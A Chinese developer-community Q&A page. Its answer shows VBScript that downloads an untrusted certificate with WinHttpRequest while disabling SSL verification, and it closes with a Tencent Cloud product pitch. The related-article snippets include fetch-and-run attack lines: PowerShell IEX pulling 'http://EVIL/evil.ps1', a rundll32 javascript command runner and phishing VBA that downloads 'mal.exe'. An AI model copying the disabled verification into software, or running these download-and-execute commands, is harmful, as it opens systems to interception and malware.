开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

尝试通过WinHttp.WinHttpRequest.5.1下载不受信任的证书文件时使用站点变量

WinHttp.WinHttpRequest.5.1是Windows平台上用于进行HTTP通信的组件。它提供了一种在客户端应用程序中发送HTTP请求和接收HTTP响应的方式。

当使用WinHttp.WinHttpRequest.5.1下载不受信任的证书文件时，可以使用站点变量来进行处理。站点变量可以用于设置请求的目标URL，以及配置请求的其他参数。

在下载不受信任的证书文件时，可以通过以下步骤使用站点变量进行处理：

创建WinHttp.WinHttpRequest对象：

Set httpRequest = CreateObject("WinHttp.WinHttpRequest.5.1")

设置目标URL和请求方法：

url = "下载证书文件的URL"
httpRequest.Open "GET", url, False

设置WinHttpRequest的Option来禁用SSL证书验证：

httpRequest.Option(4) = 0  ' 忽略SSL证书验证错误

发送HTTP请求：

httpRequest.Send

检查请求是否成功并保存证书文件：

If httpRequest.Status = 200 Then
    ' 请求成功，保存证书文件
    Set stream = CreateObject("ADODB.Stream")
    stream.Type = 1  ' 二进制流
    stream.Open
    stream.Write httpRequest.ResponseBody
    stream.SaveToFile "保存证书文件的路径", 2  ' 2表示覆盖已存在的文件
    stream.Close
End If

通过以上步骤，可以使用WinHttp.WinHttpRequest.5.1下载不受信任的证书文件并保存到指定路径。这种方法适用于需要忽略证书验证错误的情况，但要注意潜在的安全风险。

针对腾讯云相关产品，推荐使用云服务器（CVM）来部署和运行应用程序，使用对象存储（COS）来存储和管理下载的证书文件。具体产品信息和介绍可以参考腾讯云官方文档：

云服务器（CVM）：https://cloud.tencent.com/product/cvm
对象存储（COS）：https://cloud.tencent.com/product/cos

相关搜索:尝试使用SftpClient下载带有Renci.SshNet的文件时出现“没有这样的文件”错误尝试开始使用PEM证书时，Kafka返回“在PEM文件中没有匹配的私钥条目”当我尝试通过模式使用DocumentBuilderFactory验证xml文件时，收到错误“找不到元素的声明”。Ember:尝试使用this.set通过在if语句中声明的变量来设置字段时遇到问题每当我尝试使用此php脚本下载除txt文件以外的任何内容时，都会得到损坏的文件正在尝试使用laravel中的guzzle客户端通过API GET response下载mp3文件当尝试使用find命令将文本文件中变量的值设置为其他变量时，Jenkins groovy批处理错误使用R通过url批量下载时，将用作文件名链接的字符串分配给文件名木偶人，nodejs。我不确定为什么尝试通过变量传递值时会出现错误"is undefined"，但当我使用普通的int时，它可以工作高id服务器

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

WinHttp用法(WinHttp.WinHttpRequest.5.1方法，属性)

大家好，又见面了，我是你们的朋友全栈君。使用WinHttpRequest伪造HTTP头信息，伪造Referer等信息

01

使用WinHttpRequest伪造referer

从msdn得知，WinHttp.WinHttpRequest.5.1 是 msxml 4.0 的底层对象，也就是说 XMLHTTP/ServerXMLHTTP 也是在它的基础上封装而来。用 WinHttpRequest 发的请求，连 Fiddler 也监测不到，看来确实是比较底层的东西。

01

利用Javascript做后门的利用方式

//Execute A Command rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); //Write To A File rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.Fi

02

一些有趣的powershell加载命令

普通下载 IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") PowerShell 3.0+ IEX (iwr

01

渗透技巧——从github下载文件的多种方法

已知exe文件：https://github.com/3gstudent/test/raw/master/putty.exe

02

制作chm格式木马病毒

CHM是英语“Compiled Help Manual”的简写，即“已编译的帮助文件”。CHM是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。

01

通过命令下载执行恶意代码的几种姿势

在渗透过程中，攻击者往往需要通过命令下载执行恶意代码，实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。

02

VBA编写笔记：常用的对象和方法

如果启用屏幕更新，则该属性值为 True。Boolean 类型，可读写。关闭屏幕更新可加快宏的执行速度。这样将看不到宏的执行过程，但宏的执行速度加快了。当宏结束运行后，请记住将 ScreenUpdating 属性设置回 True。

02

红队笔记 - PowerShell AMSI Bypass

反恶意软件扫描接口（AMSI）打补丁将有助于绕过执行PowerShell脚本（或其他支持AMSI的内容，如JScript）时触发的AV警告，这些脚本被标记为恶意。不要在隐蔽的操作中使用原样，因为它们会被标记出来。混淆，甚至更好的是，通过改变你的脚本来击败基于签名的检测，完全消除对AMSI绕过的需要。

02

VBA 最简单的爬虫实列(静态网页HTML解析)

有爬虫兴趣的同学,可以后台加微信或者群聊,这门一起探讨!!注意爬虫千万不要涉嫌隐私问题,最好遵循Robots协议

02

渗透测试的一些tips

团队小伙伴学习亮神文章的笔记，希望对大家有所帮助... 1、windows快速查找exp systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i

03

Bruce.Wang-记一次对JS木马分析

0×00 前言随着 javascript 这类脚本语言的快速发展，它能展现的内容越来越多样，所运用的功能变得越来越强大。当运用在 web 开发上时，增加了更多的动态功能和效果，极大的改善了用户体验。但是，随着 js 的功能强大的同时，也带来了更多的安全隐患。由于 js 的混淆效果多样，常见的有 YUI Compressor、Google Closure Compiler、UglifyJS。更有 jsfuck 这种比较奇葩的加密方式。使得让软件自动的识别特征码，查杀 js 恶意代码变的非常困难。对 Java

06

记一次JS木马分析

记一次JS木马分析 0x00 前言随着 javascript 这类脚本语言的快速发展，它能展现的内容越来越多样，所运用的功能变得越来越强大。当运用在 web 开发上时，增加了更多的动态功能和效果，极大的改善了用户体验。但是，随着 js 的功能强大的同时，也带来了更多的安全隐患。由于 js 的混淆效果多样，常见的有 YUI Compressor、Google Closure Compiler、UglifyJS。更有 jsfuck 这种比较奇葩的加密方式。使得让软件自动的识别特征码，查杀 js 恶意代码变的非

08

Windows文件下载执行的15种姿势

当我们通过Web渗透获取了一个Shell，而且目标主机是Windows，我们该怎么去下载后门文件到目标主机上执行呢？

01

Excel催化剂开源第41波-网络采集类库及工具分享

在.Net4.0的框架上，只能用这个类库，在更高的框架.Net 4.5中，可以用HttpClient，比HttpRequest更高级的更易使用。

03

收集整理的23种文件下载的方式

在我们的渗透过程中，通常会需要向目标主机传送一些文件，来达到提权，维持控制等目的。

03

无文件落地攻击

所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法，常用于逃避传统的安全检测机制，本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。

04

红蓝对抗之无文件落地攻击

所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法，常用于逃避传统的安全检测机制，本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。

01

钓鱼常用的vba代码

点击上方蓝字关注我们下载并执行程序 Private Sub DownloadAndExecute() Dim droppingURL As String Dim localPath As String Dim WinHttpReq As Object, oStream As Object Dim result As Integer droppingURL = "https://example.com/mal.exe" localPath = "c

04

Fiddler/Charles - 夜神模拟器证书安装App抓包

Fiddler/Charles - 夜神模拟器证书安装App抓包 ---- 文章目录 Fiddler/Charles - 夜神模拟器证书安装App抓包前言一、软件安装 1.Openssl安装 1.1下载安装 1.2配置环境变量 1.3查看openssl版本，输入命令：openssl version 2.夜神模拟器安装 1.1 下载安装 1.2工具准备，MT管理器 3.Fiddler安装 1.1下载安装 4.Charles安装二、Charles 安装证书，抓包 1.Charles破解 2.安装证书并导出

02

Linux+Windows命令行终端下载指令大全

0x01 Linux 2.1 Wget 这款工具功能很丰富，可以充当某种功能完备的GUI下载管理器，它拥有一款理想的下载管理器所需要的所有功能，比如它可以恢复下载，可以下载多个文件，出现某个连接问题后，可以重新尝试下载，你甚至可以管理最大的下载带宽。直接下载： wget http://www.sample-videos.com/video/mp4/big.mp4 后台下载: wget -b http://www.sample-videos.com/video/mp4/big.mp4 如果互联网连接出现

02

《手把手教你》系列技巧篇（四十四）-java+ selenium自动化测试-处理https 安全问题或者非信任站点-下篇（详解教程）

这一篇宏哥主要介绍webdriver在IE、Chrome和Firefox三个浏览器上处理不信任证书的情况，我们知道，有些网站打开是弹窗，SSL证书不可信任，但是你可以点击高级选项，继续打开不安全的链接。举例来说，想必大家都应该用过前几年的12306网站购票，点击新版购票，是不是会出现如下的界面。宏哥又找了一个https的页面，如下图所示：

04

WinINet 与 WinHTTP简介

之前一直有听到WinHTTP和WinINet这两种网络服务，是Microsoft提供的两套API，但一直没有系统的用过，趁次机会一起来将这个整理一下。

03

《吐血整理》进阶系列教程-拿捏Fiddler抓包教程(12)-Fiddler设置IOS手机抓包，你知多少？？？

Fiddler不但能截获各种浏览器发出的 HTTP 请求，也可以截获各种智能手机发出的HTTP/ HTTPS 请求。

02

安全规则

安全规则可实现更安全的库和应用程序。这些规则有助于防止程序中出现安全漏洞。如果禁用其中任何规则，你应该在代码中清除标记原因，并通知开发项目的指定安全负责人。

00

《最新出炉》系列初窥篇-Python+Playwright自动化测试-33-处理https 安全问题或者非信任站点-上篇

这一篇宏哥主要介绍playwright如何在IE、Chrome和Firefox三个浏览器上处理不信任证书的情况，我们知道，有些网站打开是弹窗，SSL证书不可信任，但是你可以点击高级选项，继续打开不安全的链接。举例来说，想必大家都应该用过前几年的12306网站购票，点击新版购票，是不是会出现如下的界面。宏哥又找了一个https的页面，不过现在这种网站很少了，主要原因就是大家越来越觉得安全的重要性，想要找到这么个网站可是不容易，费了好久，一个客户的VPN刚好是这种情况，如下图所示：

07

Fiddler - 夜神模拟器证书安装App抓包

Fiddler- 夜神模拟器证书安装App抓包文章目录 Fiddler- 夜神模拟器证书安装App抓包前言一、软件安装 1.Openssl安装 1.1下载安装 1.2配置环境变量 1.3查看openssl版本，输入命令：openssl version 2.夜神模拟器安装 1.1 下载安装 1.2工具准备，MT管理器 3.Fiddler安装 1.1下载安装二、Fiddler 安装证书 1.安装证书并导出 2.格式化证书 3.通过MT管理器将证书配置到模拟器中 4.模拟器WiFi填入Fiddler代理

CVE-2020-0601：微软核心加密库漏洞学习心得

没接触过公钥签名信任体系的可能不太好理解这个漏洞。我们就撇开具体算法和PKI公钥体系，先来简单说说证书的信任关系是如何建立的。

01

《最新出炉》系列初窥篇-Python+Playwright自动化测试-33-处理https 安全问题或者非信任站点-上篇

这一篇宏哥主要介绍playwright如何在IE、Chrome和Firefox三个浏览器上处理不信任证书的情况，我们知道，有些网站打开是弹窗，SSL证书不可信任，但是你可以点击高级选项，继续打开不安全的链接。举例来说，想必大家都应该用过前几年的12306网站购票，点击新版购票，是不是会出现如下的界面。宏哥又找了一个https的页面，不过现在这种网站很少了，主要原因就是大家越来越觉得安全的重要性，想要找到这么个网站可是不容易，费了好久，一个客户的V**刚好是这种情况，如下图所示：

01

jenkins配置.net mvc网站

jenkins配置.net mvc网站上一篇使用jenkins配置.net mvc网站进行持续集成一只是简单介绍了jenkins构建站点到本地服务器，这一篇，就来讲解如何部署站点到指定的服务器上面。

06

VSTO部署中的坑

在【Internet 属性】里（可运行inetcpl.cpl打开），把服务器内网IP加进【受信任站点】就好，不用管excel信任中心。

02

WINHTTP的API接口说明。

BOOL WINAPI WinHttpAddRequestHeaders( _In_ HINTERNET hRequest, _In_ LPCWSTR pwszHeaders, _In_ DWORD dwHeadersLength, _In_ DWORD dwModifiers ); 作用：加入�一个HTTP的请求头域。參数说明： hRequest [in] 一个HINTERNET句柄通过调用WinHttpOpenRequest返回。

02

ArcGIS Enterprise11基础部署_以Redhat8.6上单机安装为例

对于机器名，请务必不要包含arcgis.com，诸如xxx.arcgis.com, xxx.xxarcgis.com, xxx.arcgisxx.com都禁止作为机器名。

01

toxssin-XSS 漏洞利用命令行界面和有效负载生成器

toxssin 是一种开源渗透测试工具，可自动执行跨站脚本 (XSS) 漏洞利用过程。它由一个 https 服务器组成，它充当为该工具 (toxin.js) 提供动力的恶意 JavaScript 有效负载生成的流量的解释器。

02

代码质量规则

.NET 代码分析提供旨在提高代码质量的规则。这些规则分为设计、全球化、性能和安全性等领域。某些规则特定于 .NET API 用法，而其他规则与通用代码质量相关。

03

从网络协议的角度聊一聊最近Github被大规模攻击事件

3月27日 Github 疑似遭受大规模攻击， desktop.github.com 、 pages.github.com 、 *.github.io 等多个站点均提示 "您的连接不是私密连接"，并且电信、移动、联通、教育网均可复现该问题。

02

HTTPS 安全最佳实践（二）之安全加固

当你的网站上了 HTTPS 以后，可否觉得网站已经安全了？这里提供了一个 HTTPS 是否安全的检测工具，你可以试试。

01

.Net魔法堂：史上最全的ActiveX开发教程——部署篇

一、前言　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　接《.Net魔法堂：史上最全的ActiveX开发教程——发布篇》，后我们继续来部署吧！二、挽起衣袖来部署　　　　　　　　　　　　　　　　　　　　　　　　　　 ActiveX的部署其实就是客户端安装ActiveX组件，对未签名和已签名的ActiveX，分别有对应的部署方式。 1. 部署未签名的ActiveX 　　未签名的ActiveX控件不受浏览器端信任，默认是不被允许安装的　　1. 将网站加入 **可信站点**

05

《手把手教你》系列技巧篇（四十三）-java+ selenium自动化测试-处理https 安全问题或者非信任站点-上篇（详解教程）

这一篇宏哥主要介绍webdriver在IE、Chrome和Firefox三个浏览器上处理不信任证书的情况，我们知道，有些网站打开是弹窗，SSL证书不可信任，但是你可以点击高级选项，继续打开不安全的链接。举例来说，想必大家都应该用过前几年的12306网站购票，点击新版购票，是不是会出现如下的界面。宏哥又找了一个https的页面，如下图所示：

05

Https证书/SSL证书异常导致访问失败该如何解决？

我们在使用SSL证书时，经常会碰到一些常见的SSL证书错误，例如浏览器提示证书无效，证书在地址栏中被红色警告等等。下面是关于SSL证书错误的几种原因及解决方法。

06

java HttpsURLConnection 实现https请求

转自：http://www.blogjava.NET/etlan/archive/2006/06/29/55767.html 摘要 JSSE是一个SSL和TLS的纯Java实现，通过JSSE可以很容易地编程实现对HTTPS站点的访问。但是，如果该站点的证书未经权威机构的验证，JSSE将拒绝信任该证书从而不能访问HTTPS站点。本文在简要介绍JSSE的基础上提出了两种解决该问题的方法。　　引言　　过去的十几年，网络上已经积累了大量的Web应用。如今，无论是整合原有的Web应用系统，还是

03

SSL证书类型选择和区别

DV域名级SSL证书：DV域名级SSL证书非常适合基本网站，小型博客，在线投资组合，信息站点，摄影站点和小型企业。它是拥有网站的任何人都可以负担得起的入门级产品，等待时间通常只需五分钟。

04

CNNIC!离我远一点

今天逛论坛居然发现CNNIC被微软和firefox加入了信任证书发布者，我原来还没注意到！CNNIC，你能够被我们信任么？别说给别人签发SSL，你自己值得被信任么？

02

Mac下也能用抓包工具Fiddler

一直以来都是在Windows底下工作，对于抓包工具，自然而然当属Fiddler最最出色。不过Fiddler是在.Net runtime环境下运行的，所以想要在Mac下使用，有些困难。

01

Wireshark、Burpsuite、Charles三大抓包神器抓取https明文

通过设置系统变量SSLKEYLOGFILE来达到解密https的效果，tls握手结束后，会将session key存放到SSLKEYLOGFILE定义的keylog中，wireshark通过加载keylog文件，将https解密成明文。

网站绑定证书的情况下是否可以避免流量劫持呢?

流量劫持是一种很老的攻击方式了.比如很常见的广告弹窗,很多人已经对这个习以为常了,并认为流量劫持不会造成什么损失,但是实际上,流量劫持可以通过很多种没办法察觉的方式,暗中窃取账号信息,谋取利益.

01

Fiddler之Chrome+移动端IOS抓包配置教程( 亲测可用，建议收藏! )

个人搜集了下近期网上最新的抓包文档，进行安装尝试，抓包成功后加以整理，内部团队分享之

01

自建https站点本地测试，如何生成https证书，localhost https测试时提示"此站点不安全"如何解决

背景：我用choco安装openssl的时候发现下载https://slproweb.com/download/Win64OpenSSL-3_3_1.exe老失败

02

HTTP被动扫描代理的那些事

HTTP 代理这个名词对于安全从业人员应该都是熟知的，我们常用的抓包工具 burp 就是通过配置 HTTP 代理来实现请求的截获修改等。然而国内对这一功能的原理类文章很少，有的甚至有错误。

02

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭